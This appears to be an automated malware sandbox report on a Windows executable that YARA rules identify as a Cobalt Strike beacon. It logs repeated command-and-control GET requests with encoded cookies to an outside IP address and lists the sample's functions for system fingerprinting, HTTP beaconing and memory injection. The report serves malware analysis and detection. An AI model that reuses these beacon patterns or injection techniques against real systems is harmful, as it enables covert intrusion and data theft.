Apr 20, 2024 15:23:53.323940039 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:23:53.665380001 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:23:53 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
143	192.168.2.5	49859	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:23:54.171652079 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:23:54.488161087 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:23:54 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
144	192.168.2.5	49860	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:23:54.953073025 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:23:55.271513939 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:23:55 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
145	192.168.2.5	49861	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:23:55.711571932 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:23:56.028839111 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:23:55 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
146	192.168.2.5	49862	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:23:56.473541021 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:23:56.797075987 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:23:56 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
147	192.168.2.5	49863	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:23:57.230623960 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:23:57.545744896 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:23:57 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
148	192.168.2.5	49864	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:23:57.993652105 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:23:58.310406923 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:23:58 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
149	192.168.2.5	49865	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:23:58.741123915 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:23:59.060419083 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:23:58 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
150	192.168.2.5	49866	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:23:59.478089094 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:23:59.781225920 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:23:59 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
151	192.168.2.5	49867	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:24:00.200036049 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:24:00.509985924 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:24:00 GMT Content-Type: application/octet-stream Content-Length: 0

Target ID:	0
Start time:	15:21:52
Start date:	20/04/2024
Path:	C:\Users\user\Desktop\cH0s914NeF.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\cH0s914NeF.exe"
Imagebase:	0x400000
File size:	2'434'849 bytes
MD5 hash:	0CFC4721129AC02DEB897ED2BECAFD9A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000002.3263445653.0000000003660000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.3263445653.0000000003660000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000002.3263445653.0000000003660000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000002.3263445653.0000000003660000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_b54b94ac, Description: Rule for beacon sleep obfuscation routine, Source: 00000000.00000002.3263445653.0000000003660000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000002.3263445653.0000000003660000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: CobaltStrike_Unmodifed_Beacon, Description: Detects unmodified CobaltStrike beacon DLL, Source: 00000000.00000002.3263445653.0000000003660000.00000040.00001000.00020000.00000000.sdmp, Author: yara@s3c.za.net Rule: WiltedTulip_ReflectiveLoader, Description: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Source: 00000000.00000002.3263445653.0000000003660000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000002.3263445653.0000000003660000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_b54b94ac, Description: Rule for beacon sleep obfuscation routine, Source: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Beacon_K5om, Description: Detects Meterpreter Beacon - file K5om.dll, Source: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: CobaltStrike_Unmodifed_Beacon, Description: Detects unmodified CobaltStrike beacon DLL, Source: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Author: yara@s3c.za.net Rule: Leviathan_CobaltStrike_Sample_1, Description: Detects Cobalt Strike sample from Leviathan report, Source: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: crime_win32_csbeacon_1, Description: Detects Cobalt Strike loader, Source: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Author: @VK_Intel Rule: WiltedTulip_ReflectiveLoader, Description: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Source: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: MALWARE_Win_CobaltStrike, Description: CobaltStrike payload, Source: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	1
Start time:	15:21:52
Start date:	20/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	0.9%
Dynamic/Decrypted Code Coverage:	43.6%
Signature Coverage:	9.6%
Total number of Nodes:	534
Total number of Limit Nodes:	27

Executed Functions

Function 03A6E3A4 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 152
networkfileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_snprintf.LIBCMT ref: 03A6E43D

Part of subcall function 03A7D57C: _errno.LIBCMT ref: 03A7D5B3
Part of subcall function 03A7D57C: _invalid_parameter_noinfo.LIBCMT ref: 03A7D5BE

Part of subcall function 03A761C0: _snprintf.LIBCMT ref: 03A7632D

_snprintf.LIBCMT ref: 03A6E497
_snprintf.LIBCMT ref: 03A6E4AE
HttpOpenRequestA.WININET ref: 03A6E4F3
HttpSendRequestA.WININET ref: 03A6E524
InternetQueryDataAvailable.WININET ref: 03A6E554
InternetCloseHandle.WININET ref: 03A6E572
InternetReadFile.WININET ref: 03A6E5AE
InternetCloseHandle.WININET ref: 03A6E5CF

Strings

*/*, xrefs: 03A6E3E4
%s%s, xrefs: 03A6E4A3

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: Internet_snprintf$CloseHandleHttpRequest$AvailableDataFileOpenQueryReadSend_errno_invalid_parameter_noinfo
String ID: %s%s$*/*
API String ID: 1419689450-856325523
Opcode ID: 7aecab8f94b4036c401f8696ecf09a78fedfdcc2f5ec1353f6b97f9b95c732dc
Instruction ID: edabf4bb989f10ff7d86a1c9829a08d6820d98c96cba4d4ec82199ea1fe54167
Opcode Fuzzy Hash: 7aecab8f94b4036c401f8696ecf09a78fedfdcc2f5ec1353f6b97f9b95c732dc
Instruction Fuzzy Hash: F451E276700B8087EB10DF26EA40B9A77A5F789BD8F444127DE896BB54DF38C505CB40

Uniqueness

Uniqueness Score: -1.00%

Function 004011B0 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 199
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32 ref: 00401211
SetUnhandledExceptionFilter.KERNEL32 ref: 00401283
GetStartupInfoA.KERNEL32 ref: 00401493

Strings

00M, xrefs: 004014A0

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: ExceptionFilterInfoSleepStartupUnhandled
String ID: 00M
API String ID: 2839300629-201406300
Opcode ID: 0f26f41a7e75adce6d6ad24b6d884db8f5da45c045b883d9dfa6e8ef2af1840a
Instruction ID: 800417127efdb575360c5b24a3c4fb2c6986b2b9aa462cc62a1bf22641e5b22a
Opcode Fuzzy Hash: 0f26f41a7e75adce6d6ad24b6d884db8f5da45c045b883d9dfa6e8ef2af1840a
Instruction Fuzzy Hash: 43719CB571174885EB24AF56E89076A33A1F745B88F84803ADF49A37B2EF3DC844C749

Uniqueness

Uniqueness Score: -1.00%

Function 03A74578 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 116
stringCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 03A7473C: malloc.LIBCMT ref: 03A74758

GetUserNameA.ADVAPI32 ref: 03A745FF
GetComputerNameA.KERNEL32 ref: 03A74612
GetModuleFileNameA.KERNEL32 ref: 03A7462B
strrchr.LIBCMT ref: 03A7463D
GetVersionExA.KERNEL32 ref: 03A74660
_snprintf.LIBCMT ref: 03A746EB

Strings

%s%s%s, xrefs: 03A746CF

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: Name$ComputerFileModuleUserVersion_snprintfmallocstrrchr
String ID: %s%s%s
API String ID: 1671524875-1891519693
Opcode ID: fae818eb8fd9c0c714db74ffe8fa15d39289cafcbec8ba44931ade20b9bcc588
Instruction ID: dc93c562f81b0d36b025ba724a38f06e5a0393f7d757b1f3bf5f032212ae4bed
Opcode Fuzzy Hash: fae818eb8fd9c0c714db74ffe8fa15d39289cafcbec8ba44931ade20b9bcc588
Instruction Fuzzy Hash: 8741A02970478086DB05FB23AE9472BB799F78AFD4F5845269E9A0FB58DF3CC1428704

Uniqueness

Uniqueness Score: -1.00%

Function 004015F1 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemInfo.KERNELBASE ref: 00401613

Strings

Size: , xrefs: 00401737
type: , xrefs: 0040177C
state: , xrefs: 00401751
PJ, xrefs: 00401720
Address: , xrefs: 00401719

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: InfoSystem
String ID: Size: $state: $type: $ PJ$Address:
API String ID: 31276548-2712159171
Opcode ID: d2d9a20d79f48b667fec4ad628642386019d829376ff22b2baf866db759b3d7e
Instruction ID: 2f2de8d49359ca6574baf2dc4f29e5755c1f0a8472eb2725d55753b1650f3974
Opcode Fuzzy Hash: d2d9a20d79f48b667fec4ad628642386019d829376ff22b2baf866db759b3d7e
Instruction Fuzzy Hash: 8741FD65B01B0499EB40DBABE88479D27B6B749BC8F544036DE0D6B729EF3CC495C344

Uniqueness

Uniqueness Score: -1.00%

Function 00401DEC Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 64
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAddVectoredExceptionHandler.NTDLL(?,?,?,?,-00000001,00000000,004013F8), ref: 00401E12

Part of subcall function 00401CD7: RegOpenKeyExA.KERNELBASE ref: 00401D4E

Part of subcall function 004019AC: ReadProcessMemory.KERNELBASE(?,?,?,?,?,?,?,?,-00000001,?,00401E56,?,?,?,?,-00000001), ref: 004019F5
Part of subcall function 004019AC: WriteProcessMemory.KERNELBASE(?,?,?,?,?,?,?,?,-00000001,?,00401E56,?,?,?,?,-00000001), ref: 00401A8E

VirtualAlloc.KERNELBASE(?,?,?,?,-00000001,00000000,004013F8), ref: 00401E78
VirtualProtect.KERNELBASE(?,?,?,?,-00000001,00000000,004013F8), ref: 00401EA6

Part of subcall function 0049E3D0: strlen.MSVCRT ref: 0049E3E4

Strings

Kernel32.dll, xrefs: 00401E1F
Sleep, xrefs: 00401E37
PJ, xrefs: 00401EEC

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: MemoryProcessVirtual$AllocExceptionHandlerOpenProtectReadVectoredWritestrlen
String ID: PJ$Kernel32.dll$Sleep
API String ID: 4035955568-2232077683
Opcode ID: d01e9d55b00e6e0981191e73e9990ebce703bd3173a4e9b2c7e8526931e6bc5a
Instruction ID: 8b3084e0f45fbc332ce51ed4e89e62cbbcc3550dcc7cd4dfae9480297a2f112d
Opcode Fuzzy Hash: d01e9d55b00e6e0981191e73e9990ebce703bd3173a4e9b2c7e8526931e6bc5a
Instruction Fuzzy Hash: AE31F7E4751A4598EE40EB6BFC907492762B74ABC8F84402BDE0D4B776EE7DC504C709

Uniqueness

Uniqueness Score: -1.00%

Function 03A61184 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39
encryptionCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptAcquireContextA.ADVAPI32 ref: 03A611B8
CryptAcquireContextA.ADVAPI32 ref: 03A611DC
CryptGenRandom.ADVAPI32 ref: 03A611F0
CryptReleaseContext.ADVAPI32 ref: 03A61204

Strings

(, xrefs: 03A611D4
Microsoft Base Cryptographic Provider v1.0, xrefs: 03A611A2, 03A611C6

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: Crypt$Context$Acquire$RandomRelease
String ID: ($Microsoft Base Cryptographic Provider v1.0
API String ID: 685801729-4046902070
Opcode ID: 0ecf2db09cc1f196f0e69c38021da81c9c4ab729bcee4d67f8373e38de0c364e
Instruction ID: 63a3ca83759198fe29d351e74ca4ae3531e3222af193b567b3aea8136591de67
Opcode Fuzzy Hash: 0ecf2db09cc1f196f0e69c38021da81c9c4ab729bcee4d67f8373e38de0c364e
Instruction Fuzzy Hash: EB01D432700B4482E710CF6AE888759BBA5F7D8F84F89802AD68993324CF78C649C740

Uniqueness

Uniqueness Score: -1.00%

Function 004017D2 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 95
memoryinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004015F1: GetSystemInfo.KERNELBASE ref: 00401613

VirtualProtect.KERNELBASE ref: 0040183D
VirtualProtect.KERNELBASE ref: 0040187A

Part of subcall function 0049E3D0: strlen.MSVCRT ref: 0049E3E4

VirtualProtect.KERNELBASE ref: 004018F3
VirtualProtect.KERNELBASE ref: 00401930
WriteProcessMemory.KERNELBASE ref: 00401991
SleepEx.KERNEL32 ref: 0040199D

Strings

sleep %lld, xrefs: 004017E6
PJ, xrefs: 00401883, 00401939

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: ProtectVirtual$InfoMemoryProcessSleepSystemWritestrlen
String ID: PJ$sleep %lld
API String ID: 3881152833-4118811645
Opcode ID: ca00a7fc2eacdcc4947a5c241bc56a0a48f06b856e9b9be0d9f3b0f46a529ce1
Instruction ID: cafaac66e0b10d88afc58b6892dbbe161f17fb1f7e209c7d28254e12ab8ad931
Opcode Fuzzy Hash: ca00a7fc2eacdcc4947a5c241bc56a0a48f06b856e9b9be0d9f3b0f46a529ce1
Instruction Fuzzy Hash: F741F3E4712A4598FF80DB67EC90B9927A2B74AB88F844027DE0D57776DE3DC149C708

Uniqueness

Uniqueness Score: -1.00%

